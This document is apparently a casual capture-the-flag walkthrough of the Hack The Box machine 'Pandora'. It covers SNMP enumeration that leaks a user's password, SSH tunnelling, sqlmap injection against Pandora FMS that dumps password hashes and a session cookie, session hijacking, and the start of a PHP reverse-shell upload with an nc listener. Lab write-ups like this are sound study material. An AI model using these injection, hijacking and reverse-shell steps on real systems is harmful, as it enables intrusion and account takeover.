/etc/hosts pandora.htb
nmap -sV -p-
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
wfuzz --sc 200 -w Documents/wordlist/directory-list-2.3-medium.txt http://pandora.htb/FUZZ
Nothing, same for the subdoimains.
nmap n°2
sudo nmap -sU --min-rate 100 pandora.htb
161/udp open snmp
19283/udp closed keysrvr
let’s see what we can do with snmp
use auxiliary/scanner/snmp/snmp_enum
show options
set rhost
This is so cool, I can see every process, there is lot off hackers in the box.
/usr/bin/host_check -u daniel -p HotelBabylon23
ssh daniel@pandora.htb
on My computer in my script directory
python2.7 -m SimpleHTTPServer
on the target
chmod +x lse.sh
============================================================( file system )=====
[*] fst000 Writable files outside user's home.............................. yes!
[*] fst010 Binaries with setuid bit........................................ yes!
[!] fst020 Uncommon setuid binaries........................................ yes!
root 960 0.0 0.2 236420 8932 ? Ssl 10:00 0:00 /usr/lib/policykit-1/polkitd --no-debug
I have to resist!!!
I have to pwn matt first.
I’m not supposed to use this exploit…
I can do it to get both flags but it’m not a cheater.
I have other open ports.
Interesting files
Mysql user:
nmap -sV -p-
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
3306/tcp open mysql MySQL 5.5.5-10.3.32-MariaDB-0ubuntu0.20.04.1
I don’t have the creds
I wanted to browse pandora.panda.htb:
it’s in my /etc/hosts but it’s not working, so tryed to do it via ssh with curl.
curl pandora.panda.htb
Same problem, let’s see his /etc/hosts
daniel@pandora:/tmp/dir$ cat /etc/hosts localhost.localdomain pandora.htb pandora.pandora.htb pandora pandora is the website I saw on the port 80,
I think work only on localhost.
daniel@pandora:/tmp/dir$ curl pandora.pandora.htb
<meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">
Now I have to find a way to se in on my browser.
Web tunneling
It’s french but it’s good!
ssh -f daniel@pandora.htb -L 2500:localhost:80 -N
Where is the password… what is the username…(╯°□°)╯︵ ┻━┻)
Oh no I have to be fast.
Connnect with daniel
I was trying to connect with daniel.
Ihave this error:
It’s good, I have to use the API.
Browsing the files
In /var/www/pandora/pandora_console
cat pandoradb.sql |grep pass
`plugin_pass` text,
`password` varchar(45) default '',
`password` text,
`snmp_auth_pass` varchar(255) NOT NULL default '',
`snmp_privacy_pass` varchar(255) NOT NULL default '',
`plugin_pass` text,
`password` varchar(45) default NULL,
`force_change_pass` tinyint(1) unsigned NOT NULL default 0,
`last_pass_change` DATETIME NOT NULL DEFAULT 0,
`ehorus_user_level_pass` VARCHAR(45),
-- Table `treset_pass_history`
CREATE TABLE IF NOT EXISTS `treset_pass_history` (
-- "pass_opt" are deprecated for the 5.1.
`pass_opt` varchar(50) default '',
`pass` varchar(100) NOT NULL default '',
`is_password_type` tinyint(1) NOT NULL default 0,
-- Table `tpassword_history`
CREATE TABLE IF NOT EXISTS `tpassword_history` (
`id_pass` int(10) unsigned NOT NULL auto_increment,
`password` varchar(45) default NULL,
PRIMARY KEY (`id_pass`)
`plugin_pass` text default '',
`password` varchar(100) default '',
`password` varchar(100) default '',
`dbpass` text,
`meta_dbpass` text,
`api_password` text NOT NULL,
cat DB_Dockerfile
FROM mysql:5.5
MAINTAINER Pandora FMS Team <info@pandorafms.com>
WORKDIR /pandorafms/pandora_console
ADD pandoradb.sql /docker-entrypoint-initdb.d
ADD pandoradb_data.sql /docker-entrypoint-initdb.d
RUN chown mysql /docker-entrypoint-initdb.d
RUN echo " \n\
sed -i \"1iUSE \$MYSQL_DATABASE\" /docker-entrypoint-initdb.d/pandoradb.sql \n\
sed -i \"1iUSE \$MYSQL_DATABASE\" /docker-entrypoint-initdb.d/pandoradb_data.sql \n\
" >> /docker-entrypoint-initdb.d/create_pandoradb.sh
This website show where we can exploit.
I don’t use sqlmap very often, that’s why I had lot of trouble.
sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php" -D pandora
[20:44:13] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1'). You are advised to rerun with '--crawl=2'
sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php?id=''" -D pandora --tables
[20:45:33] [WARNING] GET parameter 'id' does not seem to be injectable
Now I have to find out what I have to use instead if ‘id’.
sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php?session_id=''" -D pandora
[20:47:42] [WARNING] potential permission problems detected ('Access denied')
I have an another error, it’s good.
This is a cheat sheet:
sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tpassword_history --dump
| id_pass | id_user | date_end | password | date_begin |
| 1 | matt | 0000-00-00 00:00:00 | f655f807365b6dc602b31ab3d6d43acc | 2021-06-11 17:28:54 |
| 2 | daniel | 0000-00-00 00:00:00 | 76323c174bd49ffbbdedf678f6cc89a6 | 2021-06-17 00:11:54 |
sqlmap "http://localhost:2500/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tsessions_php --dump
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:”matt”;alert_msg|a:0:{}new_chat|b:0;
You have to past it in the cookie.
Refresh the page..
And now you are matt, you can also take the admin cookie but someone else is playing with it,
so it’s not working.
I have to kill them.
Oh, sorry ppl, it’s not working.
Hummm, it’s working because I was logged in as admin, but I removed the cookie.
One of them is logged as admin, he have to finish the box first I think
Someone is using chisel, I have to try this tool too.
I think it’s like my tunnel ssh.
Ok I will try later.
As admin.
Now I’m admin on the machine, I had to wait 2 hours.
Download the revershell
I’v downloaded a reversshell here:
$ip = ''; // CHANGE THIS
$port = 4648; // CHANGE THIS
Zip it
zip -r php-reverse-shell.zip php-reverse-shell.php
nc -lvp 4648
Upload it
I’m matt
I can’t be admin on the webpage, it’s buggy.
I leave this CTF.
